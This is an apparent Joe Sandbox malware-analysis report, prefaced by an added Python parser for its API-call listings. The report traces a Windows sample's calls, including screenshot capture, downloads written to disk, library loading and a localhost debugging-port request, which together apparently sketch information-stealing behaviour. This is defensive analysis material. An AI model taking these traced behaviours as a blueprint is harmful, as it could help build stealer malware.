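The "APIs" entries in these function blocks are the report's own machine output in a fixed notation (Name.MODULE(args), ref: address, with "Part of subcall function" prefixes for inlined callees). The Python below is an added example, not part of the report or of the sample: it parses that notation into records and runs two triage checks an analyst wants over a whole report at once, the argument strings that point at the local host (the http://localhost:9229/json argument of InternetOpenUrlA above) and the samDesired mask handed to RegOpenKeyExA (00020019 is KEY_READ). The sample input is a handful of lines copied from the function blocks above; the regular expression, the function names and the small access-mask table are this example's own assumptions about the format, not anything Joe Sandbox documents.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# One entry of a Joe Sandbox "APIs" list, in the three shapes seen in this report:
#   • Name.MODULE(arg,arg,...), ref: ADDR
#   • Name.MODULE ref: ADDR                         (no argument list captured)
#   • Part of subcall function ADDR: Name.MODULE(...), ref: ADDR
_LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Registry access masks worth naming when they appear as samDesired (assumed table).
_REG_ACCESS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}

# Sample input: lines copied from the function blocks of this report.
SAMPLE_API_LINES = """\
• RegOpenKeyExA.ADVAPI32(?,00BFB288,00000000,00020019,?), ref: 00D837BD
• RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00D837F7
• wsprintfA.USER32 ref: 00D83822
• RegQueryValueExA.ADVAPI32(?,00BFE000,00000000,000F003F,?,?), ref: 00D838A1
  • Part of subcall function 00D871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00D871FE
• InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00D690FC
• strlen.MSVCRT ref: 00D691BA
• ShellExecuteEx.SHELL32(?), ref: 00D817CD
• ExitProcess.KERNEL32 ref: 00D81803
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str] = field(default_factory=list)
    ref: str = ""
    subcall_of: Optional[str] = None   # set for "Part of subcall function" entries


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse report 'APIs' entries; lines that do not fit the notation are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref").upper(), m.group("parent")))
    return calls


def loopback_urls(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """(api, url) for every argument that is an HTTP URL on the local host."""
    hits = []
    for c in calls:
        for a in c.args:
            if re.match(r"https?://(localhost|127\.0\.0\.1)(:\d+)?/", a):
                hits.append((c.api, a))
    return hits


def registry_access(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """Decode the samDesired (4th) argument of each RegOpenKeyExA/W call."""
    out = []
    for c in calls:
        if c.api in ("RegOpenKeyExA", "RegOpenKeyExW") and len(c.args) >= 4:
            try:
                mask = int(c.args[3], 16)
            except ValueError:
                continue               # placeholder such as "?" rather than a value
            out.append((c.ref, _REG_ACCESS.get(mask, hex(mask))))
    return out


def module_histogram(calls: List[ApiCall]) -> Counter:
    """Which DLLs a function block leans on; a quick fingerprint of its purpose."""
    return Counter(c.module for c in calls)


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    print("loopback :", loopback_urls(parsed))
    print("reg open :", registry_access(parsed))
    print("modules  :", dict(module_histogram(parsed)))
```

Arguments are split on commas, which is safe for this report because the string arguments it renders (paths, "ERROR", the URL) contain none; a report with comma-bearing strings would need a quote-aware split. The "?" placeholders are kept as literal arguments so that positional decoding, as in registry_access, still lines up.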
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7EFE4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7F012
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D7F026
                            • lstrlen.KERNEL32(00000000), ref: 00D7F035
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 00D7F053
                            • StrStrA.SHLWAPI(00000000,?), ref: 00D7F081
                            • lstrlen.KERNEL32(?), ref: 00D7F094
                            • lstrlen.KERNEL32(00000000), ref: 00D7F0B2
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 00D7F0FF
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 00D7F13F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$AllocLocal
                            • String ID: ERROR
                            • API String ID: 1803462166-2861137601
                            • Opcode ID: 8125e6a443a755a9210f1453879a79bc459133acdb741d5e765a3b457f1cd4f7
                            • Instruction ID: a58a91f8882b6862b0078446aa3d2c37cb666b215b536c49f771250f386ff81d
                            • Opcode Fuzzy Hash: 8125e6a443a755a9210f1453879a79bc459133acdb741d5e765a3b457f1cd4f7
                            • Instruction Fuzzy Hash: EB517A31A516059FCB31EB78DC59ABE77B5EF55304F098469FC4A9B212EA70DC028BB0
                            APIs
                            • GetEnvironmentVariableA.KERNEL32(00BF8E30,00F99BD8,0000FFFF), ref: 00D6A026
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6A053
                            • lstrlen.KERNEL32(00F99BD8), ref: 00D6A060
                            • lstrcpy.KERNEL32(00000000,00F99BD8), ref: 00D6A08A
                            • lstrlen.KERNEL32(00D94C4C), ref: 00D6A095
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6A0B2
                            • lstrcat.KERNEL32(00000000,00D94C4C), ref: 00D6A0BE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6A0E4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6A0EF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6A114
                            • SetEnvironmentVariableA.KERNEL32(00BF8E30,00000000), ref: 00D6A12F
                            • LoadLibraryA.KERNEL32(00BFDC20), ref: 00D6A143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                            • String ID:
                            • API String ID: 2929475105-0
                            • Opcode ID: c0580e130075000b1cda6ecfec946daa5f72ea915267a9aa8d7190bac95cf4b8
                            • Instruction ID: f166daaa727b5f56b30adae461904ad1989e300c92e11c54d960cc6106773edb
                            • Opcode Fuzzy Hash: c0580e130075000b1cda6ecfec946daa5f72ea915267a9aa8d7190bac95cf4b8
                            • Instruction Fuzzy Hash: 11911430600A048FD730AFACDC54A6637B5EB99705F48401AE9469B262EFB5CD85DFB2
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7C8A2
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7C8D1
                            • lstrlen.KERNEL32(00000000), ref: 00D7C8FC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7C932
                            • StrCmpCA.SHLWAPI(00000000,00D94C3C), ref: 00D7C943
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 2346197d67237b3114a6c7e20d165e520b5ceba03e0d61cfeee7275d421953ce
                            • Instruction ID: 81f3a9ecfe951bfe08eab27b050c33d7b862c240b8435f81447506fe017b8865
                            • Opcode Fuzzy Hash: 2346197d67237b3114a6c7e20d165e520b5ceba03e0d61cfeee7275d421953ce
                            • Instruction Fuzzy Hash: 3E61B071E216199FDB20EFB4C845AAE7BF8FF09345F08946EE845E7201E77489058BB0
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00D80CF0), ref: 00D84276
                            • GetDesktopWindow.USER32 ref: 00D84280
                            • GetWindowRect.USER32(00000000,?), ref: 00D8428D
                            • SelectObject.GDI32(00000000,00000000), ref: 00D842BF
                            • GetHGlobalFromStream.COMBASE(00D80CF0,?), ref: 00D84336
                            • GlobalLock.KERNEL32(?), ref: 00D84340
                            • GlobalSize.KERNEL32(?), ref: 00D8434D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                            • String ID:
                            • API String ID: 1264946473-0
                            • Opcode ID: 0f61afda42852f2d0aa46a6b68dfb4a53923cfd3425454e7137eb3e01ed37172
                            • Instruction ID: a3df088500838bca11b6c415f1f80dba19b89b776146eaa505319ddcb38eb2f2
                            • Opcode Fuzzy Hash: 0f61afda42852f2d0aa46a6b68dfb4a53923cfd3425454e7137eb3e01ed37172
                            • Instruction Fuzzy Hash: 41513C75A1020DAFDB10EFA4DC89AEEB7B9EF48344F14441AF905E3250DB74AD019BA0
                            APIs
                            • lstrcat.KERNEL32(?,00BFE1C8), ref: 00D7E00D
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D7E037
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E06F
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7E07D
                            • lstrcat.KERNEL32(?,?), ref: 00D7E098
                            • lstrcat.KERNEL32(?,?), ref: 00D7E0AC
                            • lstrcat.KERNEL32(?,00BEC000), ref: 00D7E0C0
                            • lstrcat.KERNEL32(?,?), ref: 00D7E0D4
                            • lstrcat.KERNEL32(?,00BFDC00), ref: 00D7E0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D7E126
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 4230089145-0
                            • Opcode ID: 4451bd43f01394d60e9d37b5d12dffbf70af6b2dc871b440e25b431f2e3cd620
                            • Instruction ID: e6a9f4b2000b86ca22f89846cca6e8aaa4aa4f7ab2c99b9192be5114ad9f0978
                            • Opcode Fuzzy Hash: 4451bd43f01394d60e9d37b5d12dffbf70af6b2dc871b440e25b431f2e3cd620
                            • Instruction Fuzzy Hash: 19619F7191011CEBCB15DB64CC55AEDB7B8FF4C300F5489A9AA09A3250EBB09F859FA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D66AFF
                            • InternetOpenA.WININET(00D8CFEC,00000001,00000000,00000000,00000000), ref: 00D66B2C
                            • StrCmpCA.SHLWAPI(?,00BFE7E0), ref: 00D66B4A
                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00D66B6A
                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00D66B88
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00D66BA1
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D66BC6
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00D66BF0
                            • CloseHandle.KERNEL32(00000000), ref: 00D66C10
                            • InternetCloseHandle.WININET(00000000), ref: 00D66C17
                            • InternetCloseHandle.WININET(?), ref: 00D66C21
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                            • String ID:
                            • API String ID: 2500263513-0
                            • Opcode ID: a96d746ccf5ddbadda1b8c719893893285ec28dcb9e57528819cfbe4610cca85
                            • Instruction ID: 57ff9bba7aa4ef28082e228ff3472c85163581ae4ef8a0d9d277249d8badeff8
                            • Opcode Fuzzy Hash: a96d746ccf5ddbadda1b8c719893893285ec28dcb9e57528819cfbe4610cca85
                            • Instruction Fuzzy Hash: 45418E71A40209ABEB20DF68DC49FAE77B8EB44744F044459FA05E7290EF70EE459BB4
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6BC1F
                            • lstrlen.KERNEL32(00000000), ref: 00D6BC52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6BC7C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6BC84
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6BCAC
                            • lstrlen.KERNEL32(00D94AD4), ref: 00D6BD23
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 721c4097df38ca59e6586294c8b471c5f6ca054365263f3b4227d4dd897b996b
                            • Instruction ID: 5fa0a86566bbce9fb4c9fb233a778dd9cc765e5dab033c195862a1ca818b2c54
                            • Opcode Fuzzy Hash: 721c4097df38ca59e6586294c8b471c5f6ca054365263f3b4227d4dd897b996b
                            • Instruction Fuzzy Hash: 49A17C30A116098FCB25EF68D949A6EB7B4EF44314F1D806AE406DB261DB72DD82CF70
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D85F2A
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D85F49
                            • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00D86014
                            • memmove.MSVCRT(00000000,00000000,?), ref: 00D8609F
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D860D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$memmove
                            • String ID: invalid string position$string too long
                            • API String ID: 1975243496-4289949731
                            • Opcode ID: 80c7fd20408e0b2988a72c0254b49621a17bea23ce860a1101c8a01363a01885
                            • Instruction ID: d098b13bd082ef3b20e2e3936168594b16676fbf539b6830527cc8851f85713b
                            • Opcode Fuzzy Hash: 80c7fd20408e0b2988a72c0254b49621a17bea23ce860a1101c8a01363a01885
                            • Instruction Fuzzy Hash: D5619D70700644DBDB28EF5CD894A6EB3F6EF84314B244A59E5928B385D731ED808BB9
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E06F
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7E07D
                            • lstrcat.KERNEL32(?,?), ref: 00D7E098
                            • lstrcat.KERNEL32(?,?), ref: 00D7E0AC
                            • lstrcat.KERNEL32(?,00BEC000), ref: 00D7E0C0
                            • lstrcat.KERNEL32(?,?), ref: 00D7E0D4
                            • lstrcat.KERNEL32(?,00BFDC00), ref: 00D7E0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D7E126
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
